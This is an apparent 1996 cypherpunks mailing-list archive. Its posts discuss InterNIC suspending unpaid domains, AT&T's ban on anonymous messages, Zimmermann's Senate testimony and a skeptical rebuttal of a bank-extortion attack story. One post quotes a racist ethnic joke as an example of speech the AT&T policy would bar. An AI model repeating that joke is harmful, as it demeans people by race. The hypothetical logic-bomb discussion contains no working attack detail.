-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Shifter wrote:
: 
: Nothing stops anyone from running their own name server.  However, the root
: servers are what 99% of the nameservers out there point at.  No one is going
: to use dns.joe.schmoe.org as their primary nameserver.
: 

Except of course schmoe.org.  Primary name service is usually provided
by the organization's own nameserver.  The secondary name server should
(as per the rfc whose number I forget at the moment) be on a separate
network segment.  Anyone who lists a machine from root-servers.net as their
primary needs to learn a bit more about DNS.  Root servers exist to provide
an authoritative starting point for recursive lookups, they do not provide
name service for anything other than top level domains (com. edu. net. etc.).

The NIC has the power to remove domains based upon it's authority among 
the root servers.


- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdAhfg0HmAyu61cJAQEWkQP7BFtGrStaG/ly+xl0T1u079tEM2loUGEk
MEDkFzOtHr9kTbab+fKrNwsG23M+PEpB6YIr3QUpfFgByf8jCthUJj7uqtZ952wz
iVnGMMgSE1xBMPKEAVqeJcpqzboHQP01URaPsHoya/ybLXtfQR0RUsydnMIOeEbc
c2f3LNaLzpM=
=oAeG
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herr Wendigo <wendigo@gti.net>
Date: Wed, 26 Jun 1996 08:56:47 +0800
To: shifter@portal.stwing.upenn.edu (Shifter)
Subject: Re: domain name zapping threat by Internic
In-Reply-To: <199606251353.JAA07632@portal.stwing.upenn.edu>
Message-ID: <199606251727.NAA14059@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Shifter wrote:
: 
: Nothing stops anyone from running their own name server.  However, the root
: servers are what 99% of the nameservers out there point at.  No one is going
: to use dns.joe.schmoe.org as their primary nameserver.
: 

Except of course schmoe.org.  Primary name service is usually provided
by the organization's own nameserver.  The secondary name server should
(as per the rfc whose number I forget at the moment) be on a separate
network segment.  Anyone who lists a machine from root-servers.net as their
primary needs to learn a bit more about DNS.  Root servers exist to provide
an authoritative starting point for recursive lookups, they do not provide
name service for anything other than top level domains (com. edu. net. etc.).

The NIC has the power to remove domains based upon it's authority among 
the root servers.


- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdAhfg0HmAyu61cJAQEWkQP7BFtGrStaG/ly+xl0T1u079tEM2loUGEk
MEDkFzOtHr9kTbab+fKrNwsG23M+PEpB6YIr3QUpfFgByf8jCthUJj7uqtZ952wz
iVnGMMgSE1xBMPKEAVqeJcpqzboHQP01URaPsHoya/ybLXtfQR0RUsydnMIOeEbc
c2f3LNaLzpM=
=oAeG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 26 Jun 1996 08:15:57 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: AT&T bans anonymous messages
In-Reply-To: <199606251435.HAA05846@jobe.shell.portal.com>
Message-ID: <199606251836.NAA14496@homeport.org>
MIME-Version: 1.0
Content-Type: text


Hal wrote:
| WorldNet User <anonymous-user@worldnet.att.net> writes:
| >>From the "AT&T WorldNet Service Operating Policies":

| (I can't get through to http://www.worldnet.att.net this morning.  Makes
| me appreciate that dial tone I get every day.)

Try http://www.att.com/worldnet/

| Is the WorldNet service an Internet access account, providing dial-in
| SLIP or PPP access?  Or does it also provide user accounts like shell
| accounts or like AOL?

	The AT&T service I'm familiar with (some contract work on the
back end) is what they call 'Internet Dial Tone,' which is to say, a
IP connection and nothing else.  Its a way to reach your home system,
or, if you can find a freindly DNS server, surf the web.  They talk
about adding other things later.

	The phrase Internet Dial tone appears on the att.com page.
How they intend to authenticate hundreds of thousands of dialup users
to prevent anonymity is beyond me.

	(Hals points on the ambiguity of the language are well taken.)

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 26 Jun 1996 10:55:48 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
Message-ID: <199606252053.NAA11417@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 AM 6/25/96 -0700, Rich Graves wrote:
>On Mon, 24 Jun 1996, WorldNet User wrote:
>>               (ii) Members may not post or transmit any message
>>                 which is libelous, defamatory or which discloses
>>                 private or personal matters concerning any person.
>>                 Members may not post or transmit any message,
>>                 data, image or program which is indecent, obscene
>>                 or pornographic. 
>> 
>> http://www.worldnet.att.net/care/terms/#oppol
>
>"Discloses private or personal matters concerning any person"? I guess any
>discussion of political figures is out.

Hell!  My email to my family is also ruled out.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Wed, 26 Jun 1996 11:37:13 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: AT&T bans anonymous messages
In-Reply-To: <2.2.32.19960625211952.0097c780@popserver.panix.com>
Message-ID: <199606252145.OAA03814@clotho.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So all you have to do is copy the whole statement, delete the offending
> passages, and mail it to your ISP as a counter offer to their proposed

	Or you just sign up with C2. Less stress, less hassle, less
headaches.


-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chris.liljenstolpe@SSDS.com (Christopher Liljenstolpe)
Date: Wed, 26 Jun 1996 06:02:37 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: domain name zapping threat by Internic
In-Reply-To: <199606242105.OAA00824@netcom13.netcom.com>
Message-ID: <31cffb3e.3418543@denver.ssds.com>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

	Actually, it has been InterNIC policy (for better or worse) to
do this since they talked about charging.  The fee structure is:

1) New registrations cost $100 for two years
2) Renewals cost $50 for one year

Anyone could put in a record for a dead domain in their nameserver, if
they wanted to, the InterNIC can't tell you what you can and can't do
(nor will they), however:
1) It would only benefit you and the people who use your nameserver
for their resolver
2) If the InterNIC re-issued that name to another entity, you would
not be able to access that entity
3) You would be breaking the hierarchical nature of the DNS space

The InterNIC feeds all of the root name servers for the 5 common (US)
TLD's.

There has been a large amount of talk about alternative root name
spaces.

My guess is that you will never see a free one however, as equipment
has to be bought and maintained, staff hired (I don't want my root
name space managed by someone who is only available on weekends or
evenings - I don't know about anybody else), space provided, net links
funded, etc.  This is what the InterNIC is supposedly spending the
money on (as well as trying to limit the explosion of TLD registries).

	-=Chris

On Mon, 24 Jun 96 14:05:57 -0700, the sage "Vladimir Z. Nuri"
<vznuri@netcom.com> scribed:

>
>surprising not to see any discussion on this here..
>
>this is a very intersting development. all kinds of news reports
>are talking about the internic zapping 25,000 DNS addresses.
>I wonder how this will turn out.
>
>I saw in an article a claim, I think, that the internic now charges
>$100 "rent" per year for a domain. this is really amazing to me,
>because this has totally changed from a one-time only fee, if correct.
>is that correct?
>
>I wonder if people are going to try to find a way to "route around"
>this action by the internic... one wonders if this is just the first
>in a series of actions by the new spook owners. (SAIC)  essentially,
>if someone wanted to implement a tax or a way to control the internet,
>the NIC would be an excellent place to start.
>
>I wonder if the NIC has legal authority to yank DNS address like
>they are doing. it seems one could take them to court and have
>a pretty good argument that people who run DNS servers are free
>to run them however they want, and that ultimately this is what
>determines how routing on the internet is supported, not some
>overseeing agency like the NIC.
>
>it seems to me that now would be a brilliant time for someone
>to introduce a "non NIC registration service" that sets up an
>alternate DNS that guarantees that members will never be charged
>money. of course that's what the DNS "sort of" started out as...
>
>sigh.
>
>
>Subject: Internic removing Domain names
>
>The news media is anouncing that the Internic will delete 25,000 domain 
>names that have not paid their registration fees Monday.  How will this 
>work?  If someone is using one of these Domains and has DNS entries to 
>find them what can the Internic do to disable the Domain? Won't the 
>existing DNS services keep them working?
>
>Glenn York
>
>


--
   ( (   | (               Chris Liljenstolpe <Chris.Liljenstolpe@ssds.com>
    ) ) (|  ), inc.        SSDS, Inc; 8400 Normandale Lake Blvd.; Suite 993
   business driven         Bloomington, MN   55437; 
 technology solutions      TEL 612.921.2392  FAX 612.921.2395   Fram Fram Free!
 PGP Key 1024/E8546BD5     FE 43 BD A6 3C 13 6C DB  89 B3 E4 A1 BF 6D 2A A9




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Hall <hallc@cs.colorado.edu>
Date: Wed, 26 Jun 1996 10:56:16 +0800
To: cypherpunks@toad.com
Subject: crypto '96 roommate
Message-ID: <199606252051.OAA27564@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hello,

    I plan to attend this years crypto '96, but I don't have a roommate
for the dorms.  It is much cheaper if you have a roommate so I was
wondering if anyone needed a roommate who was going?

    Please respond to me directly as I don't subscribe to cypherpunks
and I don't see any point in cluttering the list with this thread.  BTW,
the deadline for normal registration is July 12 and it would be nice to
register asap.

							Thanks,
							Chris Hall




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 26 Jun 1996 12:31:09 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
Message-ID: <199606252212.PAA17195@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 AM 6/25/96 -0700, Rich Graves wrote:
>On Mon, 24 Jun 1996, WorldNet User wrote:
>
>> AT&T WorldNet service has banned the sending of anonymous email or
>> posting anonymously.
>> 
>> >From the "AT&T WorldNet Service Operating Policies":
>> 
>> 		(i) Members may not post or transmit any message
>> 		anonymously or under a false name. Members may
>> 		not permit any other person (other than an agent
>> 		acting on Member's behalf and subject to Member's
>> 		supervision) to access the Service Member's
>> 		account for any purpose.
>
>I don't have a problem with this, actually, and a brief visit to
>news.admin.net-abuse.misc would show why. AT&T is selling you access under a
>given username. If you send a message traceable to AT&T, they are held
>accountable. 

Why should this be true?  I can still walk to a pay telephone, put in a 
quarter, dial a random number and talk to somebody anonymously.  The various 
Baby Bell companies aren't "held accountable" if it's an obscene phone call.

I think that any attempt to hold the Internet to standards higher than 
existing services is a mistake.

>I think it's reasonable for them to demand that you make
>messages traceable to yourself so that you are held accountable. 

Isn't the whole purpose of anonymity (remailers and such) in order to ensure 
that the messages AREN'T traceable?!?


>If AT&T bans or monitors access to anonymous remailers, then that's a
>different kettle of fish entirely, but they're not doing that. 

Yet.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 26 Jun 1996 12:01:18 +0800
To: Philip Zimmermann <cypherpunks@toad.com (Cypherpunks)
Subject: Re: Zimmermann's Senate testimony
Message-ID: <199606252212.PAA17199@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:39 AM 6/25/96 -0700, Philip Zimmermann wrote:
>Testimony of Philip R. Zimmermann to
>the Subcommittee on Science, Technology, and Space
>of the US Senate Committee on Commerce, Science, and 
>Transportation  26 June 1996

>The government has a track record that does not inspire confidence 
>that they will never abuse our civil liberties.  The FBI's 
>COINTELPRO program targeted groups that opposed government 
>policies.  They spied on the anti-war movement and the civil 
>rights movement.  They wiretapped Martin Luther King's phone.  
>Nixon had his enemies list.  And then there was the Watergate 
>mess.  The War on Drugs has given America the world's largest per-
>capita incarceration rate in the world, a distinction formerly 
>held by South Africa, before we surpassed them during the eighties 
>even when apartheid was in full swing.  Recently, we've seen the 
>images and sounds of the Rodney King beatings, Detective Mark 
>Fuhrman's tapes boasting of police abuses, and the disturbing 
>events of the Ruby Ridge case.  And now Congress and the Clinton 
>administration seem intent on passing laws curtailing our civil 
>liberties on the Internet.  At no time in the past century has 
>public distrust of the government been so broadly distributed 
>across the political spectrum, as it is today.
>
>The Clinton Administration seems to be attempting to deploy and 
>entrench a communications infrastructure that would deny the 
>citizenry the ability to protect its privacy.  This is unsettling 
>because in a democracy, it is possible for bad people to 
>occasionally get elected-- sometimes very bad people.  Normally, a 
>well-functioning democracy has ways to remove these people from 
>power.  But the wrong technology infrastructure could allow such a 
>future government to watch every move anyone makes to oppose it.  
>It could very well be the last government we ever elect.

Yes, the situation is bad, very bad.  And yes, I agree that a political 
system has to have ways to remove bad people.  The odd thing is, some of the people 
who say that are the same ones who get squeamish when a solution is suggested.

<sigh>


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 26 Jun 1996 10:48:56 +0800
To: cypherpunks@toad.com
Subject: Re: Tales from the UK: Basel Part IV
Message-ID: <199606251952.MAA13356@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Received: from toad.com [140.174.2.1] by alcor.process.com
>            with SMTP-OpenVMS via TCP/IP; Tue, 25 Jun 1996 11:11 -0400
> Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id HAA10621 for cypherpunks-outgoing; Tue, 25 Jun 1996 07:04:53 -0700 (PDT)
> Received: from mailhost.IntNet.net (mercury.IntNet.net [198.252.32.180]) by toad.com (8.7.5/8.7.3) with SMTP id HAA10616 for <cypherpunks@toad.com>; Tue, 25 Jun 1996 07:04:46 -0700 (PDT)
> From: winn@Infowar.Com
> Received: from 198.252.40.157 by mailhost.IntNet.net (SMI-8.6/SMI-SVR4)
> 	id KAA24757; Tue, 25 Jun 1996 10:06:02 -0400
> Date: Tue, 25 Jun 1996 10:06:02 -0400
> Message-Id: <199606251406.KAA24757@mailhost.IntNet.net>
> MIME-Version: 1.0
> Content-Type: text/plain
> Content-Transfer-Encoding: 7bit
> Subject: Tales from the UK: Basel Part IV
> To: Nmunro@access.digex.net
> X-Mailer: SPRY Mail Version: 04.00.06.17
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> June, 1996: Basel, Switzerland
> More on the London Attacks: Part IV

winn writes:

[...]
> The perpetrator(s) would first place a call to the upper management of the 
> intended victim announcing his/her intention. "We will take down your bank (or 
> financial organization) unless you pay us a lot of money not to." 
> 
> The intended victims each sluffed off the threats. Shortly thereafter (within a 
> day or two) their financial systems would seemingly collapse for no reason at 
> the prescribed time and as promised by the caller. Banking services and/or 
> trading would come to a halt, for about an hour or so, and then the affected 
> systems would come back on line. Backups were ineffective; typical disaster 
> recovery methods, I was told, just didn't work.
[...]
> I was told unequivocally that all of the four attacks used the same methodology: 
> malicious software was somehow injected into the systems but neither was either 
> forthcoming or knowledgeable about the specifics. They specifically denied that 
> HERF techniques were used. But many questions remained, and I was unsuccessful 
> at getting what I would call good answers to these and more queries:
> 
> 	- Which systems were affected exactly?
> 	- How were the backup/redundancies disconnected?
> 	- Exactly what do you mean by remote control?
> 	- Did you ever find the offending software?
> 	- Was it an insider job?
> 	- Was it pure hacking?
> 	- Was is mission critical application software gone awry?
> 	- And so on . . . .
[...] 
> 		        Winn Schwartau - Interpact, Inc.
> 		        Information Warfare and InfoSec
> 		       V: 813.393.6600 / F: 813.393.6361
> 			    Winn@InfoWar.Com

I used to work in a major money center bank (late, lamented Irving Trust). I find this
account highly improbable, considering the precautions I've seen used in these
situations.

The only possibility seems to be an inside job, inserting a logic bomb into some
crucial piece of software, and then setting it off either through an inside collaborator,
or by sending an appropriate message through the system from outside: "if you
see a transfer from acct 346769 to 56789 of $3,141,592.65, shut down for an
hour".

Inserting a bomb like this would have been extremely difficult, if not impossible, at IT.
Code modifications were always checked by more than one programmer, and an
extensive 'backout' mechanism existed which permitted us to go back to older versions
of the software in a matter of minutes.

Cracking the system from outside is also unlikely - the operational machines had
no internet connection, dial in, or connection to our development or administrative
lans, nor did they run any of the usual demons 
through which attacks are made. They were connected only to other parts of the
operational system. Even the developers did not have direct access to them - 
putting on new software involved writing it to a removable HD which was then 
physically transfered to the operational systems. Only the operators were permitted
to touch the consoles of the operational systems.

Finally, we maintained a 'hot site' duplicating most of our capability, at a location
about 100 miles away, in case of catastrophe. Switching to that would have taken
a few hours, but was certainly doable.

>Thereafter, a second call would be made to senior executives of the victim
>firms, and the extortion demands for payment made again. In these cases,
>electronic payments to Switzerland were made, and the monies were then
>secreted from their temporary Swiss home within seconds - destined for
>places unknown or unannounced.

I also find the claim improbable - the Swiss authorities are quite cooperative when
there is good reason to beleive a crime is being committed.

If it's an inside job, then it's not much of a threat, since each financial institution
would need to be penetrated separately. 

The only way in which this might NOT be an inside job would be if a logic bomb
was inserted into some piece of commercial software used by all of the targets,
such as a message database. If so, then there is no reason not to identify the
package.

Until names get named, I'm going to view this story with extreme skepticism.


Finally, people may wish to look at the source of the posting. Mr Schwartau
is a consultant who makes his living by advising institutions on how to protect
themselves against attacks of the type claimed in this story. 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chris.liljenstolpe@SSDS.com (Christopher Liljenstolpe)
Date: Wed, 26 Jun 1996 07:32:47 +0800
To: Bruce Schneier <schneier@counterpane.com>
Subject: Re: I am looking to hire a crypto person....
In-Reply-To: <v03007401adf5a5188a3b@[204.246.66.57]>
Message-ID: <31d01950.11117525@denver.ssds.com>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

	I did not realize that you were in the Minneapolis Area.  I
am, technically, but am on the road about 98% of the time as the chief
security engineer for SSDS, a integration house.

	Your offer sounds somewhat interesting, especially since I
would not have to relocate.  In either case, are you aware of any
INFOSEC related groups that meet in the Minneapolis area?  If not, do
you think that there would be enough interest to support one?

	-=Chris

On Tue, 25 Jun 1996 09:17:43 -0500, the sage Bruce Schneier
<schneier@counterpane.com> scribed:

>I am looking to hire someone part-time (with potential to upgrade to
>full-time) to work for Counterpane Systems, doing cryptography consulting
>for a variety of clients.
>
>The work is in analysis and design, mostly of cryptographic and security
>systems.  Think of SSL, SPKI, PGP... that sort of thing.  There isn't a
>whole lot of math, just critical thinking, complete analysis, and good
>writing.
>
>If anyone is interested, please send me mail.  (Depending on the number of
>responses received, I may have some kind of application test.)
>
>Bruce
>
>************************************************************************
>* Bruce Schneier            2,000,000,000,000,000,000,000,000,002,000,
>* Counterpane Systems       000,000,000,000,000,000,002,000,000,002,293
>* schneier@counterpane.com  The last prime number...alphabetically!
>* (612) 823-1098            Two vigintillion, two undecillion, two
>* 101 E Minnehaha Pkwy      trillion, two thousand, two hundred and
>* Minneapolis, MN  55419    ninety three.
>************************************************************************
>
>
>


--
   ( (   | (               Chris Liljenstolpe <Chris.Liljenstolpe@ssds.com>
    ) ) (|  ), inc.        SSDS, Inc; 8400 Normandale Lake Blvd.; Suite 993
   business driven         Bloomington, MN   55437; 
 technology solutions      TEL 612.921.2392  FAX 612.921.2395   Fram Fram Free!
 PGP Key 1024/E8546BD5     FE 43 BD A6 3C 13 6C DB  89 B3 E4 A1 BF 6D 2A A9




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 26 Jun 1996 11:22:00 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
Message-ID: <2.2.32.19960625211952.0097c780@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:48 AM 6/25/96 -0700, Timothy C. May wrote:

>I suspect other major ISPs will adopt similar language, absent a vocal
>lobbying group for anonymous messaging capabilities.

So all you have to do is copy the whole statement, delete the offending
passages, and mail it to your ISP as a counter offer to their proposed
contract.  You can explicitly disclaim the language you don't like.  This
sets up a long and interesting negotiation process during which you can try
to get them to define what they mean by the terms.  Since they haven't
defined any of this stuff (indecency?) it's all kind of meaningless.
Businesses usually won't cut you off over a mere refusal on your part to
accept a contract.  They wait for an overt act.

Might even work in the case of someone like me who pays AT&T $2K/month or more.

Then you can get a real ISP.

I have found that if you are well-behaved in a social sense, you can get
away with all sorts of controversial stuff.  I kept firearms in my college
dorm just because I argued my RA into ignoring same (he had bows and hunting
arrows).  He knew I wasn't a psycho.

I expect that AT&T will ignore what you do unless it kicks back to them so
use them for net access but don't use them for mail.  Run your own mail
server or keep a shell account somewhere else.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brian dodds <jyacc!aspen!bdodds@uunet.uu.net>
Date: Wed, 26 Jun 1996 12:25:09 +0800
To: Shifter <aspen!uunet!portal.stwing.upenn.edu!shifter@uunet.uu.net>
Subject: domain names / f-secure..
In-Reply-To: <199606251353.JAA07632@portal.stwing.upenn.edu>
Message-ID: <Pine.SUN.3.91.960625163742.16177G-100000@aspen>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 25 Jun 1996, Shifter wrote:

> There was never a "one-time" fee.  You could register as many domains as
> you wanted whenever you wanted (as long as you weren't violating a 
> trademark or something like that).  

even that was questionable, there were a rash of copyright infringements 
a couple of years ago.. the legal holders of the names that were taken 
had to go to great lengths to get the name, and sometimes could not.. i'm 
sure you've heard of the toys-r-us vs. roadkill-r-us domain dispute, and 
how microsoft.com finally `persuaded' micros0ft.com to give it up..

at any rate - has anyone tried out that new f-secure by the folks who 
brought us f-prot? "military strength internet encryption".. seems to be 
an encrypted telnet, but i can't replace our server to test it..

				bri..

--bdodds@jyacc.com
brian dodds, systems administration, jyacc, inc. wellesley, ma 
--617.431.7431x125
opinions expressed within are not necessarily my own or anyone elses..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 26 Jun 1996 09:00:29 +0800
To: cypherpunks@toad.com
Subject: Leahy vs. Landers
Message-ID: <199606251758.RAA09092@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Thanks to MF: 
 
 
   The Washington Post, June 24, 1996. 
 
 
   Dear Ann Landers: 
 
   You have recently printed letters from people whose spouses 
   have left them for people they met on the Internet. 
 
   As a 55-year-old who has been happily married for 33 years, 
   I am living proof that the vast majority of us Internet 
   fans use our computers to browse newspapers, see the 
   treasures of the Sistine Chapel, check the weather in 
   Vermont or read the latest Batman comic. I think your 
   readers should be assured that almost all Americans on-line 
   have no intention of stealing someone else's spouse or 
   leaving their own. 
 
   Just as reckless and irresponsible drivers should not ruin 
   it for drivers who act responsibly, neither should a few 
   bored Web crawlers foul up the Internet for the rest of us. 
 
   -- Sen. Patrick Leahy (D Vt.) 
 
 
   Dear Pat: 
 
   You are a superb senator. Vermont is lucky to have you. As 
   an advice columnist, however, you aren't so hot. Granted, 
   most Web crawlers are fairly decent people, but many are 
   not interested in the Sistine Chapel or Batman. The 
   Internet is tailor-made for con men, the lonely and the 
   bored. The word from here is beware. More on this subject 
   tomorrow. 
 
   [Ann's two letters today exemplify the grief and joy of 
   betrayal and love on the Net.] 
 
   Questions may be sent to: Ann Landers, c/o Creators 
   Syndicate, 5777 W. Century Blvd., Suite 700, Los Angeles, 
   Calif. 90045. 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 26 Jun 1996 09:26:03 +0800
To: cypherpunks@toad.com
Subject: Re: domain name zapping threat by Internic
Message-ID: <199606251834.SAA11158@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, June 25, 1996. 
 
 
   Domain Delinquents Get Day's Reprieve 
 
      Firm Delays Suspension of Internet Service to Process 
      Flood of Fees 
 
   By David S. Hilzenrath 
 
 
   The Herndon company that assigns the basic addresses on the 
   Internet said yesterday it would delay until this evening 
   a plan to cut off the service of address holders who 
   haven't paid the required fees. 
 
   Network Solutions Inc., which registers addresses under an 
   arrangement with the federal government, had planned to cut 
   off the delinquents yesterday, but postponed the action as 
   it processed a flood of last-minute payments. 
 
   The cutoffs involve about 10,000 of 400,000 "domain" names 
   -- the portion of the Internet address that follows the "@" 
   symbol -- whose holders have not paid Network Solutions a 
   $100 registration fee. 
 
   Network Solutions spokesman David Gravff said the company 
   would suspend service for those domain holders that had not 
   paid by 5 p.m. on Sunday. The service of those who pay 
   between that time and tonight will be suspended, but the 
   company will soon reinstate it. The cutoff involves domain 
   holders that registered their addresses between Sept. 14, 
   when Network Solutions began charging new users, and Feb. 
   28. 
 
   Domain names may be held by companies, universities, 
   individuals, government agencies or other organizations, 
   and a single domain name might be used by many people. 
   People using domain names that are suspended would not be 
   able to receive electronic mail. Similarly, people would 
   not be able to connect to World Wide Web sites using 
   suspended domains. 
 
   The company two weeks ago estimated that 25,000 domain 
   names would be suspended, but it reduced the total as 
   last-minute payments arrived. 
 
   The company will wait 60 days before reissuing the 
   suspended domain names to new users, giving delinquent 
   users another chance to pay and reclaim them, Graves said. 
 
   ----- 
 
   For More Information: Is your domain name available? Find 
   out by visiting The Post's site on the World Wide Web at: 
   http://www.washingtonpost.com 
 
   [End] 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Wed, 26 Jun 1996 15:13:29 +0800
To: cypherpunks@toad.com
Subject: Re: domain name zapping threat by Internic
Message-ID: <9606260152.AA24057@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 PM 6/25/96 GMT, Greg Miller wrote:
>
>	Since the NIC charges $100 per registration, you can bet there will be
>some legislation somewhere along the line.  They must be makeing 5000-10000%
>profit.

  Regarding NIC's policy concerning the taking away of domain names if X
states Y usurped his trademark, there are at least 4 suits pending wherein
the domain name owners/plaintiffs are challenging the alleged infringement,
namely:

First lawsuit - Roadrunner v. NSI
background at: http://www.patents.com/nsi.sht
complaint at: http://www.patents.com/nsicpt1.sht

Second lawsuit - DCI v. DCI and NSI
background at: http://www.patents.com/dci/dci.sht
complaint at: 
http://infolawalert.com/source/src061496_dc_complaint.html

Third lawsuit - Giacalone v. NSI et al.
complaint at: http://zeus.bna.com/e-law/cases/giac.html

Fourth lawsuit - Clue Computing v. NSI
background at:  http://www.clue.com/legal/index.html
complaint at:  http://www.clue.com/legal/complain.html

Fun and games....

Regards -
Lynne




*************************************************************
Lynne L. Harrison, Esq.      |     "The key to life:
Poughkeepsie, New York       |      - Get up;
lharrison@mhv.net            |      - Survive;
http://www.dueprocess.com    |      - Go to bed."
*************************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Wed, 26 Jun 1996 14:33:53 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
Message-ID: <960625203335_339565441@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


How on earth can a service try to stop anonymous dealings. Well.. i can see
HOW... because they say their just going to do it. Now.. I know theres such
things as the internet task force....etc... Isnt there any groups out there
whose _SOLE_ purpose is trying to protect rights in the online community?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chris.liljenstolpe@SSDS.com (Christopher Liljenstolpe)
Date: Wed, 26 Jun 1996 10:48:24 +0800
To: cypherpunks@toad.com
Subject: Appology
Message-ID: <31d056c0.9637303@denver.ssds.com>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

	I appologize for copying the whole list on my letter to Bruce.
I just changed mailers and the meaning of r and R have been reversed
:(

	-=Chris


--
   ( (   | (               Chris Liljenstolpe <Chris.Liljenstolpe@ssds.com>
    ) ) (|  ), inc.        SSDS, Inc; 8400 Normandale Lake Blvd.; Suite 993
   business driven         Bloomington, MN   55437; 
 technology solutions      TEL 612.921.2392  FAX 612.921.2395   Fram Fram Free!
 PGP Key 1024/E8546BD5     FE 43 BD A6 3C 13 6C DB  89 B3 E4 A1 BF 6D 2A A9




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Wed, 26 Jun 1996 15:08:28 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
Message-ID: <960625214547_339643612@emout17.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



>	(ii) Members may not post or transmit any message
>>                 which is libelous, defamatory or which discloses
>>                 private or personal matters concerning any person.
>>                 Members may not post or transmit any message,
>>                 data, image or program which is indecent, obscene
>>                 or pornographic. 

political figures..yep....out.
the most recent Oj or whoever joke...out
ANY ethnic joke...out. IE yo mam's so black she went to nightschool and they
marked her absent..... OUT
This cr*p is so unlimited as to what rights of ours it overruns on.
Imagine this: a message posted appeals to 34,000 people that read it.
1 person is offended..complains..
Same thing happens again. The person's user access is cancelled.
BS? You decide. My opinion is evident =-}





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Wed, 26 Jun 1996 17:44:51 +0800
To: Cypherpunks@toad.com
Subject: Alternic.net (was domain zapping)
Message-ID: <Pine.SUN.3.91.960625220103.16972A@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


